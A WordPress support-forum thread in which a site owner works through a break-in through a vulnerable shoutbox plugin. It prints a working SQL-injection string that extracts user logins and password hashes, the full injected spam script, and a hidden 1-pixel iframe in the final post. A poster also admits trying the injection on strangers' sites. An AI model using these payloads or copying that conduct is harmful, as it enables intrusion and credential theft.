WordPress.org

Ready to get started?Download WordPress

Forums

[resolved] Getting hacked today and now, please help (21 posts)

  1. idahofallzcom
    Member
    Posted 6 years ago #

    Well life sucks 8^(

    IdahoFallz.com, I've been getting hacked the past few hours. I suspect SQL injection but I've no idea where or how to plug it. ANY help or advice really would be appreciated!

    The attacker is so far only starting draft posts under various user names, each one taunts me that I've been hacked or places ads. I have the "Notify on draft post" plugin so some of the attacker's posts are being submitted to me for approval, some are not. None have been posted so I'm not suer if the person has admin access (yet). I changed my WP password and my FTP password. My files so far seem ordinary, nothing replaced or added so far.

    The attacker came back a couple hours later and posted a couple more drafts. One is titled "We got owned by Evo - Voide.org/" and the content is:

    It seems that you got owned by Evo, no harm has been done. I have simply found an error within your site and posted a news article to let you know. So this is just a let you know post.
    Peace.
    Evo

    and every single category is checked.

    I changed the passwords to uber-difficult for the users he had created posts under, to compensate if those users had weak passwords.

    A couple hours later he came back, used mostly different users but one user which I had changed the password for, so I don't think that's the avenue.

    I had Pierre's shoutbox running, and this was one messsage posted:

    -998877/**/UNION /**/SELECT/**/0, 1,concat(0x7c,us er_login,0x7c,us er_pass,0x7c),co ncat(0x7c,user_l ogin,0x7c,user_p ass,0x7c),4,5/** /FROM/**/wp_user s

    I disabled that plugin but a couple hours later I get more saved posts from the attacker.

    I'm looking at the error_log at my site root and see several database error warnings from this afternoon:

    '[02-Feb-2008 19:59:00] WordPress database error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND comment_approved = '1' ORDER BY comment_date DESC LIMIT 1' at line 1 for query SELECT comment_date FROM wp_comments WHERE comment_date > FROM_UNIXTIME(1200790740) AND comment_post_ID = AND comment_approved = '1' ORDER BY comment_date DESC LIMIT 1'

    I know this is Saturday night but any help is really appreciated here.

    Thanks!

  2. whooami
    Member
    Posted 6 years ago #

    remove or rename your xmlrpc.php file

  3. idahofallzcom
    Member
    Posted 6 years ago #

    man and it continues

    I noticed my pages weren't loading, and I was generating HUGE error_logs. I deleted the error_log and two seconds later it was up to 62 mb. I finally got it downloaded and found errors related to a script running in page.php

    This is what I found in my page.php:

    <?php
    $tpl = "/home/.numnod/mwsmedia/mattselznick.com/gfx/t-m-p.html";
    $repl = "<REPL>";
    $w1 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $w2 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $w3 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $w4 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $w5 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $w6 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $w7 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $w8 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $w9 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $w10 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $w11 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $w12 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $w13 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $keys = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $wr1 = $w1[rand(0, count($w1)-1)];
    $wr2 = $w2[rand(0, count($w2)-1)];
    $wr3 = $w3[rand(0, count($w3)-1)];
    $wr4 = $w4[rand(0, count($w4)-1)];
    $wr5 = $w5[rand(0, count($w5)-1)];
    $wr6 = $w6[rand(0, count($w6)-1)];
    $wr7 = $w7[rand(0, count($w7)-1)];
    $wr8 = $w8[rand(0, count($w8)-1)];
    $wr9 = $w9[rand(0, count($w9)-1)];
    $wr10 = $w10[rand(0, count($w10)-1)];
    $wr11 = $w11[rand(0, count($w11)-1)];
    $wr12 = $w12[rand(0, count($w12)-1)];
    $wr13 = $w13[rand(0, count($w13)-1)];
    $q = $_GET['go'];
    $q = ereg_replace(".htm", "", $q);
    $q = ereg_replace("-", " ", $q);
    $fp = fopen($tpl, "r");
    $fin = '';
    while (!feof($fp))
         $fin .= fgets($fp, 1024);
    fclose($fp);
    $fin = ereg_replace($repl, $q, $fin);
    $rd = rand(0,10000);
      $rd = $rd."";
     $rd2 = rand(0,10000);
      $rd2 = $rd2."";
     $rd3 = rand(0,10000);
      $rd3 = $rd3."";
     $rd4 = rand(0,10000);
      $rd4 = $rd4."";
     $rd5 = rand(0,10000);
      $rd5 = $rd5."";
    $fin = ereg_replace("<SOME>", $rd , $fin);
    $fin = ereg_replace("<SOME2>", $rd2 , $fin);
    $fin = ereg_replace("<SOME3>", $rd3 , $fin);
    $fin = ereg_replace("<SOME4>", $rd4 , $fin);
    $fin = ereg_replace("<SOME5>", $rd5 , $fin);
    $wr1l = ereg_replace(" ","-" , $wr1);
    $fin = ereg_replace("<KEY1>", $wr1, $fin);
    $fin = ereg_replace("<KEY1l>", $wr1l, $fin);
    $wr2l = ereg_replace(" ","-" , $wr2);
    $fin = ereg_replace("<KEY2>", $wr2, $fin);
    $fin = ereg_replace("<KEY2l>", $wr2l, $fin);
    $wr3l = ereg_replace(" ","-" , $wr3);
    $fin = ereg_replace("<KEY3>", $wr3, $fin);
    $fin = ereg_replace("<KEY3l>", $wr3l, $fin);
    $wr4l = ereg_replace(" ","-" , $wr4);
    $fin = ereg_replace("<KEY4>", $wr4, $fin);
    $fin = ereg_replace("<KEY4l>", $wr4l, $fin);
    $wr5l = ereg_replace(" ","-" , $wr5);
    $fin = ereg_replace("<KEY5>", $wr5, $fin);
    $fin = ereg_replace("<KEY5l>", $wr5l, $fin);
    $wr6l = ereg_replace(" ","-" , $wr6);
    $fin = ereg_replace("<KEY6>", $wr6, $fin);
    $fin = ereg_replace("<KEY6l>", $wr6l, $fin);
    $fin = ereg_replace("<KEY7>", $wr7, $fin);
    $fin = ereg_replace("<KEY8>", $wr8, $fin);
    $fin = ereg_replace("<KEY9>", $wr9, $fin);
    $fin = ereg_replace("<KEY10>", $wr10, $fin);
    $fin = ereg_replace("<KEY11>", $wr11, $fin);
    $fin = ereg_replace("<KEY12>", $wr12, $fin);
    $fin = ereg_replace("<KEY13>", $wr13, $fin);
    $n = 10;
    $links = "";
    for ($i=0; $i<$n; $i++)
    {
      $rankey = trim($keys[rand(0, count($keys)-1)]);
      $ranhref = ereg_replace(" ", "-", $rankey)."";
      $links = $links." <a href='./?go=$ranhref.htm'>$rankey</a><br>";
    }
    $fin = ereg_replace("<LINK>", $links, $fin);
    echo $fin;
    ?>

    Man I'm getting hacked hard here, any advice to batten down the hatches?

  4. whooami
    Member
    Posted 6 years ago #

    remove or rename your xmlrpc.php file

  5. macsoft3
    Member
    Posted 6 years ago #

    You have a collection of affiliate spam links at the bottom. And, again, 711 here and there...

  6. idahofallzcom
    Member
    Posted 6 years ago #

    cool, i deleted the xmlrpc.php and the footer spam links, so far so good but it's still early

    my host sent me the record showing i was attacked through wordspew chatbox. i was running a slightly older 3.01 version cuz the new one kept blocking users.

    i would like to ensure the latest does not have the same attack vector as 3.01, though

  7. idahofallzcom
    Member
    Posted 6 years ago #

    what's 711 here and there?

  8. idahofallzcom
    Member
    Posted 6 years ago #

    I went to bed last night hoping the activity was over, but it's not. This morning there where three more post drafts saved, each taunting me for being hacked by worldhackerz.net, each under different existing usernames. I saved a local copy of the xmlprc.php last night and completely deleted it, and I disabled the wordspew plugin. I'm running spybot and ad-aware on my system now.

    Any other advice? I'm also still wondering "what's 711 here and there?"

  9. Joni
    Member
    Posted 6 years ago #

    http://www.textpattern.com

    That's where I'm headed. I'm thoroughly disgusted. I've been a WP forum member for nearly four years. This latest round of crap is the last straw. I develop WP sites for a living and I can no longer countenance this crap. There have been no definitive solutions to my problem. I can't peddle this program to any of my paying clients, it's insanity.

    Backup your database, migrate to TextPattern, import your WP posts and have a nice life.

    It's what I plan to do.

    Sorry I can't be more help.

  10. idahofallzcom
    Member
    Posted 6 years ago #

    Dammit! I just checked my site about 30 minutes ago, no spam links. I check a moment ago again, and the spam links are back in my footer. I check footer.php and that same eval() link is there.

    HELP!?!? What is the hole here?

  11. whooami
    Member
    Posted 6 years ago #

    if you re-enabled wordspew, that might be part of your problem

    There is a version that is exploitable, so if youre opting to use that version for the sake of functionality, well, you can expect to reap what you sow.

  12. idahofallzcom
    Member
    Posted 6 years ago #

    I did not re-enable wordspew, I of course want to wait to make sure I'm not being attacked anymore. I of course also learned my lesson and when I do reenble wordspew will go with the latest version and will deal with the functionality issues at that time.

    i went to delete the wordspew folder from my plugins directly, and it is gone already. why would the hacker delete it? i looked in my other plugin folders and did not see it moved anywhere. it does not appear in my admin panel plugins activation page, either.

    spybot found not a single issue on my system. i reinstalled my pc a few weeks ago so it is fairly fresh.

    i had one other admin account, but i demoted that account to a writer and changed it's password.

    i'll try changing my passwords again, but i've got a feeling this is not over.

    What is the hole here?

  13. whooami
    Member
    Posted 6 years ago #

    What is the hole here?

    Considering that this is the second time youve asked that, and no-one has succinctly answered that question, you might consider your question answered with a "no-one knows".

    You might want to consider some options related to logging the data thats actual sent to your blog. You CAN log all $_POST variables, you dont need to log $_GET requests as they show up in your Apache logs already, but you can, you CAN even log everything that is sent to xmlrpc.php, via the superglobal $_SERVER, but you shouldn't need to do that since youve disabled it.

    In other words, at this point, I can only recommend taking a look at whats going on behind the scene, so to speak.

    perhaps someone else has other ideas.
    --

    edit
    On second look, regarding xmlrpc.php, just to correct my previous statement, theres a logging option built in.

  14. idahofallzcom
    Member
    Posted 6 years ago #

    Okay, as I said I completely removed the xmlrpc.php file, how do I do this logging? I am reading that other thread and you said to email you for the instructions to do that? do i need to put xmlrpc.php back in there under a renamed filename or ?

    Thanks for the help!

  15. whooami
    Member
    Posted 6 years ago #

    I would NOT put back xmlrpc.php -- that IS NOT a solution to your problem.

    I explain how to log ALL $_POST variables sent to a wordpress blog and why it might be useful on my own blog >

    http://www.village-idiot.org/archives/2008/02/02/wordpress-honeypot-project/

    Please read the following closely:

    You will want to edit that code, so that passwords of your writers are NOT written a to the logging file. Its done by putting in the IPs at the top.. My example only provides for 2 IPs, so if you have more than 2 you will need to change that line slightly.

    The file that is written to needs to be writable by the web server, that means, typically, that it needs to be chmod 666.

    Also, this will LOG ALL PASSWORDS used during logging in to the site. (thats why you want to make sure that you edit the $posty_ip so that YOUR info is NOT sent and that NO other administrator info is...

    You will also want to rename the file that is logged to, don't use the default name in my example, as anyone can bring it up in a browser and read it, as long as they know what is named. (Unless you put in a non-web accessable directory, which is doable, as well.)

    --

    This is not something that I recommend for the average user. IF, after reading that post, you are completely confused, dont try to forge ahead -- contact me privately at whoo AT whoo.org and if you really want to do this, I will help you through setting it up via email or chat.

    I would also ONLY do this if you are still actively being exploited.

  16. idahofallzcom
    Member
    Posted 6 years ago #

    Cool, I had not replaced the xmlrpcs.php yet so we're good. I think I can do what you're describing, but as you suggested I'll wait to see if I get hacked once more before trying.

    I'll update later today if anything happens or not. The help is invaluable and much appreciated!

  17. idahofallzcom
    Member
    Posted 6 years ago #

    So far so good.

    Maybe one last bit of advice and wisdom for future inquiries. My site is one of the few that really use that shoutbox, since it's locally focused on a city.

    I downloaded Rudd-O's wordspew version 2.4 (latest) cuz it says it corrects the SQL injection that pierr'es had. However, Pierre had some nicer anti-spam measures, and the ability to mark someone's IP as a spammer, then they could not post anymore. Rudd-O's does not, and I'm getting spam dropped every minute. That's a no-go.

    So I went back to Pierre's blog, again I was using the outdated 3.01 so I see Pierre is up to version 3.71. I'm reading through his changelog

    http://pierre.sudarovich.free.fr/index.php/2006/02/28/ajax-shoutbox/

    and it appears at versions 3.3 and 3.34 he fixed some SQL vulnerabilities. Unfortunately I cannot tell if he fixed the SQL vulnerability that allowed my site to get hacked.

    Can anyone verify yay or nay if the 3.71 wordspew from pierre is secure from that SQL vulnerability (which BTW I found: http://www.milw0rm.com/exploits/5039 )

    thanks

  18. whooami
    Member
    Posted 6 years ago #

    you can test that yourself,

    just tack this onto your normal blog url:

    wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users

    I doubt anyone else really wants to attempt an exploit on a stranger's site; I know i dont.

    if it spits out your username and passwd you might wanna pass on it.

  19. Lester Chan
    Member
    Posted 6 years ago #

    i think the id can be fix by something like $id = intval($_GET['id']); and you should let the author of the plugin know.

  20. idahofallzcom
    Member
    Posted 6 years ago #

    It seems settled now, WordPress' 2.3.3 update fixed xmlrpc.php vulnerabilities, and Pierre released 3.72 wordspew to fix the sql injection.

    I did attempt the injection on some other sites, just grayhatting, and got back the database usernames and passwords, but the passwords were all in md5 hash, and I could not get a single one to decipher in the various free engines.

    I wonder how the attacker gained access? Were they able to login under some of my users who created weak passwords? After I updated users with stronger passwords some of them still got cracked again, and none of my users were admin yet some spam links were pasted into my footer, and my entire page.php was replaced by malicious code. My password was a strong mix, so I don't know how they were able to get in that far.

    Perhaps they got in as a low level user, then used another hack to find my admin info?

    Maybe will never know...

  21. newslite
    Member
    Posted 6 years ago #

    I'm too think

    <iframe width="200" height="1" src="http://freelove.100webspace.net/index.php"></iframe>

Topic Closed

This topic has been closed to new replies.

About this Topic